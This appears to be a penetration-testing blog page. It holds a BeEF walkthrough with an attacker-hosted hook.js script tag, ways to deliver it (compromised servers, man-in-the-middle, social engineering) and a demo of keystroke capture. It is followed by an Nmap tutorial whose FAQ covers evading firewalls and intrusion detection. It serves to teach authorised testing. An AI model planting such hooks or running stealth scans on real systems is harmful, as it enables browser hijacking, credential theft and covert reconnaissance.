Once the install is finished, we can change to its directory and launch BeEF:

root@kali:/# cd /usr/share/beef-xss
root@kali:/# ./beef

You should see the following:This screen tells us that BeEF is running on two different interfaces, locally and internally, both on port 3000. It also provides the link for the “hook” and the user interface control panel. All of these settings and more are customizable via the “config.yaml” file found in the program’s root directory.Now that BeEF is up and running, let’s check out the control panel.  Using a web browser we’ll browse to the link listed above. In my case it’s http://192.168.1.101:3000/ui/panel. You should be able to access this link from any machine on the same local network, but if you have a host-based firewall turned on you may need to open the appropriate ports to access it. The user name and password are beef:beef.

Once logged in we’re greeted with a helpful Getting Started page that explains some of the additional options. But the most important point is in the first paragraph. Here we learn how to “hook” a browser. BeEF provides two example pages in order to test with.

The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run on client browsers. When it does, it calls back to the BeEF server communicating a lot of information about the target. It also allows additional commands and modules to be ran against the target.  In this example, the location of my BeEF hook is at http://192.168.1.101:3000/hook.js.

In order to attack a browser, we need to include our JavaScript hook in a page that the client will view. There are a number of ways to do that, but the easiest is to insert the following into a page and somehow get the client to open it.

<script src=”http://192.168.1.101:3000/hook.js&#8221; type=”text/javascript”></script>

In a real-world test, you could insert this link in a page via a compromised web server, inject it into traffic after a successful man-in-the-middle attack, or use social engineering techniques such as phone calls, emails, or social network links to get the target to visit the page.

For this demonstration, click the link beside “basic demo page here.” Once that page loads, go back to the BeEF Control Panel and click on “Online Browsers” on the top left. After a few seconds you should see your IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.

When you click on any machine on the left, you’ll see a lot more details and functionality. The screenshot below shows the Logs tab on the right. We can see that I typed “secret password” into the text box on the demo page. Notice that I didn’t submit the page, I just typed it in.

As an experiment, try clicking anywhere else on the demo page except for in the text box. Now type something like “abcdef.” Now go back to the BeEF Control Panel and click the Refresh button at the bottom of the Logs tab. You should notice a new event similar to this:

Now click on the Commands tab. You’ll find a wide range of commands and exploits that can be launched against your target. Try them out, but be patient; sometimes it takes awhile for commands to finish and report their results. The more you experiment with each command, the more you’ll know how reliable it is and how best to use it. In addition to the exploits listed, BeEF can also be integrated with Metasploit in order to launch a wider range of exploits against the host system. That’ll be another blog post.

Notice that some of the commands have different colored icons. If you click back to the Getting Started tab, there’s an explanation of what each of the colors represent.

Now that you’re up and running there’s a lot more that you can do with BeEF. Experiment with the different options in your lab so that you’ll be ready to go when the opportunity presents itself during an engagement.

WE WILL SOON FOLLOW UP ON A SERIES OF POSTS ON BEEF.

NMAP – A Stealth Port Scanner

NMAP – A Stealth Port Scanner

ETHICAL HACKING

 

Contents

1  Introduction

Nmap is a free, open-source port scanner available for both UNIX and Windows. It has an optional graphical front-end, NmapFE, and supports a wide variety of scan types, each one with different benefits and drawbacks.
This article describes some of these scan types, explaining their relative benefits and just how they actually work. It also offers tips about which types of scan would be best against which types of host.
The article assumes you have Nmap installed (or that you know how to install it. Instructions are available on the Nmap website, http://www.insecure.org/nmap/install/inst-source.html ), and that you have the required privileges to run the scans detailed (many scans require root or Administrator privileges).
A frequently asked questions section has been added since the first version of this article, and this is included as the last section in this version. This is a fully revised and updated version of this tutorial, re-typed and converted to a TeX format, allowing more output formats to be utilised. At the time of writing, the latest Nmap version was 4.11.

2  Disclaimer

This information is provided to assist users of Nmap in scanning their own networks, or networks for which they have been given permission to scan, in order to determine the security of such networks. it is not intended to assist with scanning remote sites with the intention of breaking into or exploiting services on those sites, or for imformation gathering purposes beyond those allowed by law. I hereby disclaim any responsibility for actions taken based upon the information in this article, and urge all who seek information towards a destructive end to reconsider their life, and do something constructive instead.

3  Basic Scan Types [-sT, -sS]

The two basic scan types used most in Nmap are TCP connect() scanning [-sT] and SYN scanning (also known as half-open, or stealth scanning) [-sS].
These two types are explained in detail below.

3.1  TCP connect() Scan [-sT]

These scans are so called because UNIX sockets programming uses a system call named connect() to begin a TCP connection to a remote site. If connect() succeeds, a connection was made. If it fails, the connection could not be made (the remote system is offline, the port is closed, or some other error occurred along the way). This allows a basic type of port scan, which attempts to connect to every port in turn, and notes whether or not the connection succeeded. Once the scan is completed, ports to which a connection could be established are listed as open, the rest are said to be closed.
This method of scanning is very effective, and provides a clear picture of the ports you can and cannot access. If a connect() scan lists a port as open, you can definitely connect to it – that is what the scanning computer just did! There is, however, a major drawback to this kind of scan; it is very easy to detect on the system being scanned. If a firewall or intrusion detection system is running on the victim, attempts to connect() to every port on the system will almost always trigger a warning. Indeed, with modern firewalls, an attempt to connect to a single port which has been blocked or has not been specifically “opened” will usually result in the connection attempt being logged. Additionally, most servers will log connections and their source IP, so it would be easy to detect the source of a TCP connect() scan.
For this reason, the TCP Stealth Scan was developed.

3.2  SYN Stealth Scan [-sS]

I’ll begin this section with an overview of the TCP connection process. Those familiar with TCP/IP can skip the first few paragraphs.
When a TCP connection is made between two systems, a process known as a “three way handshake” occurs. This involves the exchange of three packets, and synchronises the systems with each other (necessary for the error correction built into TCP. Refer to a good TCP/IP book for more details.
The system initiating the connection sends a packet to the system it wants to connect to. TCP packets have a header section with a flags field. Flags tell the receiving end something about the type of packet, and thus what the correct response is.
Here, I will talk about only four of the possible flags. These are SYN (Synchronise), ACK (Acknowledge), FIN (Finished) and RST (Reset). SYN packets include a TCP sequence number, which lets the remote system know what sequence numbers to expect in subsequent communication. ACK acknowledges receipt of a packet or set of packets, FIN is sent when a communication is finished, requesting that the connection be closed, and RST is sent when the connection is to be reset (closed immediately).
To initiate a TCP connection, the initiating system sends a SYN packet to the destination, which will respond with a SYN of its own, and an ACK, acknowledging the receipt of the first packet (these are combined into a single SYN/ACK packet). The first system then sends an ACK packet to acknowledge receipt of the SYN/ACK, and data transfer can then begin.
SYN or Stealth scanning makes use of this procedure by sending a SYN packet and looking at the response. If SYN/ACK is sent back, the port is open and the remote end is trying to open a TCP connection. The scanner then sends an RST to tear down the connection before it can be established fully; often preventing the connection attempt appearing in application logs. If the port is closed, an RST will be sent. If it is filtered, the SYN packet will have been dropped and no response will be sent. In this way, Nmap can detect three port states – open, closed and filtered. Filtered ports may require further probing since they could be subject to firewall rules which render them open to some IPs or conditions, and closed to others.
Modern firewalls and Intrusion Detection Systems can detect SYN scans, but in combination with other features of Nmap, it is possible to create a virtually undetectable SYN scan by altering timing and other options (explained later).

4  FIN, Null and Xmas Tree Scans [-sF, -sN, -sX]

With the multitude of modern firewalls and IDS’ now looking out for SYN scans, these three scan types may be useful to varying degrees. Each scan type refers to the flags set in the TCP header. The idea behind these type of scans is that a closed port should respond with an RST upon receiving packets, whereas an open port should just drop them (it’s listening for packets with SYN set). This way, you never make even part of a connection, and never send a SYN packet; which is what most IDS’ look out for.
The FIN scan sends a packet with only the FIN flag set, the Xmas Tree scan sets the FIN, URG and PUSH flags (see a good TCP/IP book for more details) and the Null scan sends a packet with no flags switched on.
These scan types will work against any system where the TCP/IP implementation follows RFC 793. Microsoft Windows does not follow the RFC, and will ignore these packets even on closed ports. This technicality allows you to detect an MS Windows system by running SYN along with one of these scans. If the SYN scan shows open ports, and the FIN/NUL/XMAS does not, chances are you’re looking at a Windows box (though OS Fingerprinting is a much more reliable way of determining the OS running on a target!)
The sample below shows a SYN scan and a FIN scan, performed against a Linux system. The results are, predictably, the same, but the FIN scan is less likely to show up in a logging system.

 1 [chaos]# nmap -sS 127.0.0.1
   2
   3 Starting Nmap 4.01 at 2006-07-06 17:23 BST
   4 Interesting ports on chaos (127.0.0.1):
   5 (The 1668 ports scanned but not shown below are in state:
   6         closed)
   7 PORT     STATE SERVICE
   8 21/tcp   open  ftp
   9 22/tcp   open  ssh
  10 631/tcp  open  ipp
  11 6000/tcp open  X11
  12
  13 Nmap finished: 1 IP address (1 host up) scanned in 0.207
  14         seconds
  15 [chaos]# nmap -sF 127.0.0.1
  16
  17 Starting Nmap 4.01 at 2006-07-06 17:23 BST
  18 Interesting ports on chaos (127.0.0.1):
  19 (The 1668 ports scanned but not shown below are in state:
  20         closed)
  21 PORT     STATE         SERVICE
  22 21/tcp   open|filtered ftp
  23 22/tcp   open|filtered ssh
  24 631/tcp  open|filtered ipp
  25 6000/tcp open|filtered X11
  26
  27 Nmap finished: 1 IP address (1 host up) scanned in 1.284
  28         seconds

5  Ping Scan [-sP]

This scan type lists the hosts within the specified range that responded to a ping. It allows you to detect which computers are online, rather than which ports are open. Four methods exist within Nmap for ping sweeping.
The first method sends an ICMP ECHO REQUEST (ping request) packet to the destination system. If an ICMP ECHO REPLY is received, the system is up, and ICMP packets are not blocked. If there is no response to the ICMP ping, Nmap will try a “TCP Ping”, to determine whether ICMP is blocked, or if the host is really not online.
A TCP Ping sends either a SYN or an ACK packet to any port (80 is the default) on the remote system. If RST, or a SYN/ACK, is returned, then the remote system is online. If the remote system does not respond, either it is offline, or the chosen port is filtered, and thus not responding to anything.
When you run an Nmap ping scan as root, the default is to use the ICMP and ACK methods. Non-root users will use the connect() method, which attempts to connect to a machine, waiting for a response, and tearing down the connection as soon as it has been established (similar to the SYN/ACK method for root users, but this one establishes a full TCP connection!)
The ICMP scan type can be disabled by setting -P0 (that is, zero, not uppercase o).

6  UDP Scan [-sU]

Scanning for open UDP ports is done with the -sU option. With this scan type, Nmap sends 0-byte UDP packets to each target port on the victim. Receipt of an ICMP Port Unreachable message signifies the port is closed, otherwise it is assumed open.
One major problem with this technique is that, when a firewall blocks outgoing ICMP Port Unreachable messages, the port will appear open. These false-positives are hard to distinguish from real open ports.
Another disadvantage with UDP scanning is the speed at which it can be performed. Most operating systems limit the number of ICMP Port Unreachable messages which can be generated in a certain time period, thus slowing the speed of a UDP scan. Nmap adjusts its scan speed accordingly to avoid flooding a network with useless packets. An interesting point to note here is that Microsoft do not limit the Port Unreachable error generation frequency, and thus it is easy to scan a Windows machine’s 65,535 UDP Ports in very little time!!
UDP Scanning is not usually useful for most types of attack, but it can reveal information about services or trojans which rely on UDP, for example SNMP, NFS, the Back Orifice trojan backdoor and many other exploitable services.
Most modern services utilise TCP, and thus UDP scanning is not usually included in a pre-attack information gathering exercise unless a TCP scan or other sources indicate that it would be worth the time taken to perform a UDP scan.

7  IP Protocol Scans [-sO]

The IP Protocol Scans attempt to determine the IP protocols supported on a target. Nmap sends a raw IP packet without any additional protocol header (see a good TCP/IP book for information about IP packets), to each protocol on the target machine. Receipt of an ICMP Protocol Unreachable message tells us the protocol is not in use, otherwise it is assumed open. Not all hosts send ICMP Protocol Unreachable messages. These may include firewalls, AIX, HP-UX and Digital UNIX). These machines will report all protocols open.
This scan type also falls victim to the ICMP limiting rate described in the UDP scans section, however since only 256 protocols are possible (8-bit field for IP protocol in the IP header) it should not take too long.
Results of an -sO on my Linux workstation are included below.

 1 [chaos]# nmap -sO 127.0.0.1
   2
   3 Starting Nmap 4.01 at 2006-07-14 12:56 BST
   4 Interesting protocols on chaos(127.0.0.1):
   5 (The 251 protocols scanned but not shown below are
   6         in state: closed)
   7 PROTOCOL STATE         SERVICE
   8 1        open          icmp
   9 2        open|filtered igmp
  10 6        open          tcp
  11 17       open          udp
  12 255      open|filtered unknown
  13
  14 Nmap finished: 1 IP address (1 host up) scanned in
  15         1.259 seconds

8  Idle Scanning [-sI]

Idle scanning is an advanced, highly stealthed technique, where no packets are sent to the target which can be identified to originate from the scanning machine. A zombie host (and optionally port) must be specified for this scan type. The zombie host must satisfy certain criteria essential to the workings of this scan.
This scan type works by exploiting “predictable IP fragmentation ID” sequence generation on the zombie host, to determine open ports on the target. The scan checks the IPID on the zombie, then spoofs a connection request to the target machine, making it appear to come from the zombie. If the target port is open, a SYN/ACK session acknowledgement will be sent from the target machine back to the zombie, which will RST the connection since it has no record of having opened such a connection. If the port on the target is closed, an RST will be sent to the zombie, and no further packets will be sent. The attacker then checks the IPID on the zombie again. If it has incremented by 2 (or changed by two steps in its sequence), this corresponds to the packet received from the target, plus the RST from the zombie, which equates to an open port on the target. If the IPID has changed by one step, an RST was received from the target and no further packets were sent.
Using this mechanism, it is possible to scan every port on a target, whilst making it appear that the zombie was the one doing the scanning. Of course, the spoofed connection attempts will likely be logged, so the target system will have the zombie IP address, and the zombie system’s logs are likely to contain the attacker’s IP address, so it is still possible, after acquiring logs through legal channels, to determine the attacker, but this method makes it much more difficult to do so than if the packets were sent directly from the attacker. In addition, some IDS and firewall software makes attempts to detect spoofed packets based on the network they arrive from. As long as the zombie host and the attacker are both “out on the Internet”, or on the same network as each other, relative to the target, techniques to identify spoofed packets are not likely to succeed.
This scan type requires certain things of the zombie. The IPID sequence generation must be predictable (single-step increments, for example). The host must also have low traffic so that it is unlikely for other packets to hit the zombie whilst Nmap is carrying out its scan (as these will artificially inflate the IPID number!). Cheap routers or MS Windows boxes make good zombie hosts. Most operating systems use randomised sequence numbers (see the OS Fingerprinting section for details on how to check a target’s sequence generation type).
The idle scan can also be used to determine IP trust based relationships between hosts (e.g. a firewall may allow a certain host to connect to port x, but not other hosts). This scan type can help to determine which hosts have access to such a system.
For more information about this scan type, read http://www.insecure.org/nmap/idlescan.html

9  Version Detection [-sV]

Version Detection collects information about the specific service running on an open port, including the product name and version number. This information can be critical in determining an entry point for an attack. The -sV option enables version detection, and the -A option enables both OS fingerprinting and version detection, as well as any other advanced features which may be added in future releases.
Version detection is based on a complex series of probes, detailed in the Version Detection paper at http://www.insecure.org/nmap/vscan/

10  ACK Scan [-sA]

Usually used to map firewall rulesets and distinguish between stateful and stateless firewalls, this scan type sends ACK packets to a host. If an RST comes back, the port is classified “unfiltered” (that is, it was allowed to send its RST through whatever firewall was in place). If nothing comes back, the port is said to be “filtered”. That is, the firewall prevented the RST coming back from the port. This scan type can help determine if a firewall is stateless (just blocks incoming SYN packets) or stateful (tracks connections and also blocks unsolicited ACK packets).
Note that an ACK scan will never show ports in the “open” state, and so it should be used in conjunction with another scan type to gain more information about firewalls or packet filters between yourself and the victim.

11  Window Scan, RPC Scan, List Scan [-sW, -sR, -sL]

The TCP Window scan is similar to the ACK scan but can sometimes detect open ports as well as filtered/unfiltered ports. This is due to anomalies in TCP Window size reporting by some operating systems (see the Nmap manual for a list, or the nmap-hackers mailing list for the full list of susceptible OS’).
RPC Scans can be used in conjunction with other scan types to try to determine if an open TCP or UDP port is an RPC service, and if so, which program, and version numbers are running on it. Decoys are not supported with RPC scans (see section on Timing and Hiding Scans, below).
List scanning simply prints a list of IPs and names (DNS resolution will be used unless the -n option is passed to Nmap) without actually pinging or scanning the hosts.

12  Timing and Hiding Scans

12.1  Timing

Nmap adjusts its timings automatically depending on network speed and response times of the victim. However, you may want more control over the timing in order to create a more stealthy scan, or to get the scan over and done with quicker.
The main timing option is set through the -T parameter. There are six predefined timing policies which can be specified by name or number (starting with 0, corresponding to Paranoid timing). The timings are Paranoid, Sneaky, Polite, Normal, Aggressive and Insane.
A -T Paranoid (or -T0) scan will wait (generally) at least 5 minutes between each packet sent. This makes it almost impossible for a firewall to detect a port scan in progress (since the scan takes so long it would most likely be attributed to random network traffic). Such a scan will still show up in logs, but it will be so spread out that most analysis tools or humans will miss it completely.
A -T Insane (or -T5) scan will map a host in very little time, provided you are on a very fast network or don’t mind losing some information along the way.
Timings for individual aspects of a scan can also be set using the –host_timeout, –max_rtt_timeout, –min_rtt_timeout, –initial_rtt_timeout, –max_parallelism, –min_parallelism, and –scan_delay options. See the Nmap manual for details.

12.2  Decoys

The -D option allows you to specify Decoys. This option makes it look like those decoys are scanning the target network. It does not hide your own IP, but it makes your IP one of a torrent of others supposedly scanning the victim at the same time. This not only makes the scan look more scary, but reduces the chance of you being traced from your scan (difficult to tell which system is the “real” source).

12.3  FTP Bounce

The FTP protocol (RFC 959) specified support for a “proxy” ftp, which allowed a connection to an FTP server to send data to anywhere on the internet. This tends not to work with modern ftpds, in which it is an option usually disabled in the configuration. If a server with this feature is used by Nmap, it can be used to try to connect to ports on your victim, thus determining their state.
This scan method allows for some degree of anonymity, although the FTP server may log connections and commands sent to it.

12.4  Turning Off Ping

The -P0 (that’s a zero) option allows you to switch off ICMP pings. The -PT option switches on TCP Pings, you can specify a port after the -PT option to be the port to use for the TCP ping.
Disabling pings has two advantages: First, it adds extra stealth if you’re running one of the more stealthy attacks, and secondly it allows Nmap to scan hosts which don’t reply to pings (ordinarily, Nmap would report those hosts as being “down” and not scan them).
In conjunction with -PT, you can use -PS to send SYN packets instead of ACK packets for your TCP Ping.
The -PU option (with optional port list after) sends UDP packets for your “ping”. This may be best to send to suspected-closed ports rather than open ones, since open UDP ports tend not to respond to zero-length UDP packets.
Other ping types are -PE (Standard ICMP Echo Request), -PP (ICMP Timestamp Request), -PM (Netmask Request) and -PB (default, uses both ICMP Echo Request and TCP ping, with ACK packets)

12.5  Fragmenting

The -f option splits the IP packet into tiny fragments when used with -sS, -sF, -sX or -sN. This makes it more difficult for a firewall or packet filter to determine the packet type. Note that many modern packet filters and firewalls (including iptables) feature optional defragmenters for such fragmented packets, and will thus reassemble the packet to check its type before sending it on. Less complex firewalls will not be able to cope with fragmented packets this small and will most likely let the OS reassemble them and send them to the port they were intended to reach. Using this option could crash some less stable software and hardware since packet sizes get pretty small with this option!

12.6  Idle Scanning

See the section on -sI for information about idle scans.

13  OS Fingerprinting

The -O option turns on Nmap’s OS fingerprinting system. Used alongside the -v verbosity options, you can gain information about the remote operating system and about its TCP Sequenmce Number generation (useful for planning Idle scans).
An article on OS detection is available at http://www.insecure.org/nmap/nmap-fingerprinting-article.html

14  Outputting Logs

Logging in Nmap can be provided by the -oN, -oX or -oG options. Each one is followed by the name of the logfile. -oN outputs a human readable log, -oX outputs an XML log and -oG outputs a grepable log. The -oA option outputs in all 3 formats, and -oS outputs in a format I’m sure none of you would ever want to use (try it; you’ll see what I mean!)
The –append-output option appends scan results to the output files you specified instead of overwriting their contents.

15  Other Nmap Options

15.1  IPv6

The -6 option enables IPv6 in Nmap (provided your OS has IPv6 support). Currently only TCP connect, and TCP connect ping scan are supported. For other scantypes, seehttp://nmap6.sourceforge.net

15.2  Verbose Mode

Highly recommended, -v
Use -v twice for more verbosity. The option -d can also be used (once or twice) to generate more verbose output.

15.3  Resuming

Scans cancelled with Ctrl+C can be resumed with the --resume <logfilename> option. The logfile must be a Normal or Grepable logfile (-oN or -oG).

15.4  Reading Targets From A File

-iL <inputfilename> reads targets from inputfilename rather than from the command-line.
The file should contain a hostlist or list of network expressions separated by spaces, tabs or newlines. Using a hyphen as inputfile makes Nmap read from standard input.

15.5  Fast Scan

The -F option scans only those ports listed in the nmap_services file (or the protocols file if the scan type is -sO). This is far faster than scanning all 65,535 ports!!

15.6  Time-To-Live

The -ttl <value> option sets the IPv4 packets time-to-live. The usefulness of this is in mapping paths through networks and determining ACL’s on firewalls (setting the ttl to one past the packet filter can help to determine information about the filtering rules themselves). Repeated Nmap scans to a single port using differing ttl values will emulate a traceroute style network path map (Try it, its great fun for a while, until you get bored and realise traceroute does it all for you automatically!).

16  Typical Scanning Session

First, we’ll sweep the network with a simple Ping scan to determine which hosts are online.

   1 [chaos]# nmap -sP 10.0.0.0/24
   2
   3 Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at
   4         2006-07-14 14:19 BST
   5 Host 10.0.0.1 appears to be up.
   6 MAC Address: 00:09:5B:29:FD:96 (Netgear)
   7 Host 10.0.0.2 appears to be up.
   8 MAC Address: 00:0F:B5:96:38:5D (Netgear)
   9 Host 10.0.0.4 appears to be up.
  10 Host 10.0.0.5 appears to be up.
  11 MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.)
  12 Nmap finished: 256 IP addresses (4 hosts up) scanned in 5.399 seconds

Now we’re going to take a look at 10.0.0.1 and 10.0.0.2, both listed as Netgear in the ping sweep. These IPs are good criteria for routers (in fact I know that 10.0.0.1 is a router and 10.0.0.2 is a wireless access point, since it’s my network, but lets see what Nmap makes of it…)
We’ll scan 10.0.0.1 using a SYN scan [-sS] and -A to enable OS fingerprinting and version detection.

   1 [chaos]# nmap -sS -A 10.0.0.1
   2
   3 Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at
   4         2006-07-14 14:23 BST
   5 Insufficient responses for TCP sequencing (0),
   6         OS detection may be less accurate
   7 Interesting ports on 10.0.0.1:
   8 (The 1671 ports scanned but not shown below are in state:
   9         closed)
  10 PORT   STATE SERVICE    VERSION
  11 80/tcp open  tcpwrapped
  12 MAC Address: 00:09:5B:29:FD:96 (Netgear)
  13 Device type: WAP
  14 Running: Compaq embedded, Netgear embedded
  15 OS details: WAP: Compaq iPAQ Connection Point or
  16         Netgear MR814
  17
  18 Nmap finished: 1 IP address (1 host up) scanned in
  19         3.533 seconds

The only open port is 80/tcp – in this case, the web admin interface for the router. OS fingerprinting guessed it was a Netgear Wireless Access Point – in fact this is a Netgear (wired) ADSL router. As it said, though, there were insufficient responses for TCP sequencing to accurately detect the OS.
Now we’ll do the same for 10.0.0.2…

   1 [chaos]# nmap -sS -A 10.0.0.2
   2
   3 Starting Nmap 4.01 ( http://www.insecure.org/nmap/ )
   4         at 2006-07-14 14:26 BST
   5 Interesting ports on 10.0.0.2:
   6 (The 1671 ports scanned but not shown below are in state:
   7         closed)
   8 PORT   STATE SERVICE VERSION
   9 80/tcp open  http    Boa HTTPd 0.94.11
  10 MAC Address: 00:0F:B5:96:38:5D (Netgear)
  11 Device type: general purpose
  12 Running: Linux 2.4.X|2.5.X
  13 OS details: Linux 2.4.0 - 2.5.20
  14 Uptime 14.141 days (since Fri Jun 30 11:03:05 2006)
  15
  16 Nmap finished: 1 IP address (1 host up) scanned in 9.636
  17         seconds

Interestingly, the OS detection here listed Linux, and the version detection was able to detect the httpd running. The accuracy of this is uncertain, this is a Netgear home wireless access point, so it could be running some embedded Linux!
Now we’ll move on to 10.0.0.4 and 10.0.0.5, these are likely to be normal computers running on the network…

   1 [chaos]# nmap -sS -P0 -A -v 10.0.0.4
   2
   3 Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at
   4         2006-07-14 14:31 BST
   5 DNS resolution of 1 IPs took 0.10s. Mode:
   6         Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
   7 Initiating SYN Stealth Scan against 10.0.0.4 [1672 ports] at 14:31
   8 Discovered open port 21/tcp on 10.0.0.4
   9 Discovered open port 22/tcp on 10.0.0.4
  10 Discovered open port 631/tcp on 10.0.0.4
  11 Discovered open port 6000/tcp on 10.0.0.4
  12 The SYN Stealth Scan took 0.16s to scan 1672 total ports.
  13 Initiating service scan against 4 services on 10.0.0.4 at 14:31
  14 The service scan took 6.01s to scan 4 services on 1 host.
  15 For OSScan assuming port 21 is open, 1 is closed, and neither are
  16         firewalled
  17 Host 10.0.0.4 appears to be up ... good.
  18 Interesting ports on 10.0.0.4:
  19 (The 1668 ports scanned but not shown below are in state: closed)
  20 PORT     STATE SERVICE VERSION
  21 21/tcp   open  ftp     vsftpd 2.0.3
  22 22/tcp   open  ssh     OpenSSH 4.2 (protocol 1.99)
  23 631/tcp  open  ipp     CUPS 1.1
  24 6000/tcp open  X11      (access denied)
  25 Device type: general purpose
  26 Running: Linux 2.4.X|2.5.X|2.6.X
  27 OS details: Linux 2.4.0 - 2.5.20, Linux 2.5.25 - 2.6.8 or
  28         Gentoo 1.2 Linux 2.4.19 rc1-rc7
  29 TCP Sequence Prediction: Class=random positive increments
  30                          Difficulty=4732564 (Good luck!)
  31 IPID Sequence Generation: All zeros
  32 Service Info: OS: Unix
  33
  34 Nmap finished: 1 IP address (1 host up) scanned in 8.333 seconds
  35                Raw packets sent: 1687 (74.7KB) | Rcvd: 3382 (143KB)

From this, we can deduce that 10.0.0.4 is a Linux system (in fact, the one I’m typing this tutorial on!) running a 2.4 to 2.6 kernel (Actually, Slackware Linux 10.2 on a 2.6.19.9 kernel) with open ports 21/tcp, 22/tcp, 631/tcp and 6000/tcp. All but 6000 have version information listed. The scan found the IPID sequence to be all zeros, which makes it useless for idle scanning, and the TCP Sequence prediction as random positive integers. The -v option is needed to get Nmap to print the IPID information out!
Now, onto 10.0.0.5…

   1 [chaos]# nmap -sS -P0 -A -v 10.0.0.5
   2
   3 Starting Nmap 4.01 ( http://www.insecure.org/nmap/ )
   4         at 2006-07-14 14:35 BST
   5 Initiating ARP Ping Scan against 10.0.0.5 [1 port] at 14:35
   6 The ARP Ping Scan took 0.01s to scan 1 total hosts.
   7 DNS resolution of 1 IPs took 0.02s. Mode: Async
   8         [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
   9 Initiating SYN Stealth Scan against 10.0.0.5 [1672 ports] at 14:35
  10 The SYN Stealth Scan took 35.72s to scan 1672 total ports.
  11 Warning:  OS detection will be MUCH less reliable because we did
  12         not find at least 1 open and 1 closed TCP port
  13 Host 10.0.0.5 appears to be up ... good.
  14 All 1672 scanned ports on 10.0.0.5 are: filtered
  15 MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.)
  16 Too many fingerprints match this host to give specific OS details
  17 TCP/IP fingerprint:
  18 SInfo(V=4.01%P=i686-pc-linux-gnu%D=7/14%Tm=44B79DC6%O=-1%C=-1%M=00142A)
  19 T5(Resp=N)
  20 T6(Resp=N)
  21 T7(Resp=N)
  22 PU(Resp=N)
  23
  24 Nmap finished: 1 IP address (1 host up) scanned in 43.855 seconds
  25                Raw packets sent: 3369 (150KB) | Rcvd: 1 (42B)

No open ports, and Nmap couldn’t detect the OS. This suggests that it is a firewalled or otherwise protected system, with no services running (and yet it responded to ping sweeps).
We now have rather more information about this network than we did when we started, and can guess at several other things based on these results. Using that information, and the more advanced Nmap scans, we can obtain further scan results which will help to plan an attack, or to fix weaknesses, in this network.

17  Frequently Asked Questions

This section was added as an extra to the original tutorial as it became popular and some questions were asked about particular aspects of an nmap scan. I’ll use this part of the tutorial to merge some of those into the main tutorial itself.

17.1  I tried a scan and it appeared in firewall logs or alerts. What else can I do to help hide my scan?

This question assumes you used a scan command along the lines of:

   1 nmap -sS -P0 -p 1-140 -O -D xxx.xxx.xxx.xxx,
   2         xxx.xxx.xxx.xxx, xxx.xxx.xxx.xxx -sV xxx.xx.xxx.xxx

Note: Each xxx corresponds to an octet of the IP address/addresses. This is instructing NMAP to run a Stealth scan (-sS) without pinging (-P0) on ports 1 to 140 (-p 1-140), to use OS Detection (-O) and to use Decoys (-D). The three comma-separated IPs are the decoy IPs to use. It also specifies to use version scanning (-sV) which attempts to determine precisely which program is running on a port.
Now, heres the analysis of this command: A stealth scan (-sS) is often picked up by most firewalls and IDS systems nowdays. It was originally designed to prevent logging of a scan in the logs for whatever server is running on the port the scanner connects to. In other words, if the scan connects to port 80 to test if its open, Apache (or whatever other webserver they may be using) will log the connection in its logfiles.
The -sS scan option doesn’t make a full TCP connect (which can be achieved with the -sT option, or by not running as root) but resets the connection before it can be fully established. As such, most servers will not log the connection, but an IDS or firewall will recognise this behaviour (in repeated cases) as typical of a port scan. This will mean that the scan shows up in firewall or IDS logs and alerts. There are few ways around this, to be honest. Most firewall/IDS software nowdays is quite good at detecting these things; particularly if its running on the same host as the victim (the system you are scanning).
Note also, that decoys will not prevent your IP showing entirely; it just lists the others as well. A particularly well designed IDS may even be able to figure out which is the real source of the scans.
Where speed of scan isn’t essential, the -P0 option is a good idea. Nmap gains timing information from pinging the host, and can often complete its scans faster with this information, but the ping packets will be sent to the victim from your IP, and any IDS worth its CPU cycles will pick up on the pattern of a few pings followed by connects to a variety of ports. -P0 also allows scanning of hosts which do not respond to pings (i.e. if ICMP is blocked by a firewall or by in-kernel settings).
I mentioned timing in the above paragraph. You can use the -T timing option to slow the scan down. The slower a scan is, the less likely it is to be detected by an IDS. There are bound to be occasional random connects occurring, people type an IP in wrong or try to connect and their computer crashes half way through the connect. These things happen, and unless an IDS is configured extremely strictly, they generally aren’t reported (at least, not in the main alert logs, they may be logged if logging of all traffic is enabled, but typically these kind of logs are only checked if theres evidence of something going on). Setting the timing to -T 0 or -T 1 (Paranoid or Sneaky) should help avoid detection. As mentioned in my main tutorial, you can also set timing options for each aspect of a scan,

Timings for individual aspects of a scan can also be set using the –host_timeout, –max_rtt_timeout, –min_rtt_timeout, –initial_rtt_timeout, –max_parallelism, –min_parallelism, and –scan_delay options. See the Nmap manual for details.

The final note I will add to this answer is that use of the Idle scan method (-sI) means that not a single packet is sent to the victim from your IP (provided you also use the -P0 option to turn off pings). This is the ultimate in stealth as there is absolutely no way the victim can determine that your IP is responsible for the scan (short of obtaining log information from the host you used as part of your idle scan).

17.2  NMAP seems to have stopped, or my scan is taking a very long while. Why is this?

The timing options can make it take a very long time. I believe the -T Paranoid ( -T 0 )option waits up to 5 minutes between packets… now, for 65000 ports, thats 65000 x 5 = 325000 minutes = 225 days!!
-T Sneaky ( -T 1 ) waits up to 15 seconds between scans, and is therefore more useful; but scans will still take a long while! You can use -v to get more verbose output, which will alert you as to the progress of the scan. Using -v twice makes the output even more verbose.

17.3  Will -sN -sX and -sF work against any host, or just Windows hosts?

-sN -sX and -sF scans will work against any host, but Windows computers do not respond correctly to them, so scanning a Windows machine with these scans results in all ports appearing closed. Scanning a *nix or other system should work just fine, though. As I said in the main tutorial, -sX -sF and -sN are commonly used to determine if you’re scanning a Windows host or not, without using the -O fingerprinting option.
The Nmap manual page should help to determine which scans work alongside which options, and on which target systems they are most effective.

17.4  How do I find a dummy host for the Idle Scan (-sI)?

You simply have to scan for hosts using sequential IPID sequences, these are (often) suitable for use as a dummy host for the -sI Idle Scan.

17.5  What does “Host seems down. If it is really up, but blocking our ping probes, try -P0” mean?

When Nmap starts, it tries to ping the host to check that it is online. Nmap also gains timing information from this ping. If the remote host, or a system on the path between you and the remote host, is blocking pings, this ping will not be replied to, and Nmap will not start scanning. Using the -P0 option, you can turn off ping-on-start and have Nmap try to scan anyway.

17.6  Where can I find NmapFE?

NmapFE is a graphical front-end for Nmap.
